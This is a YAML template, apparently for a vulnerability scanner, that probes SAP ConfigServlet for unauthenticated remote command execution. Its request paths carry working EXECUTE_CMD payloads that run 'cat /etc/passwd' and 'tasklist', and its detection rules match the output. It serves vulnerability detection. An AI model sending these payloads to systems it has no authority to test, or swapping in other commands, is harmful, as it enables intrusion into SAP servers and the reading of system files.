id: sap-configservlet-rce
info:
  name: SAP ConfigServlet
  risk: Critical

params:
  - root: "{{.BaseURL}}"

variables:
  - prefix: |
      /
      /sap/
  - path: |
      ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat+/etc/passwd
      ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig%3bEXECUTE_CMD%3bCMDLINE=cat+/etc/passwd
      ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist
      ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig%3bEXECUTE_CMD%3bCMDLINE=tasklist
requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.prefix}}{{.path}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "/bin/bash")
      - >-
        StatusCode() == 200 && StringSearch("response", '.exe') && StringSearch("response", 'PID') && StringSearch("response", 'Session')

references:
  - link: https://www.exploit-db.com/exploits/24963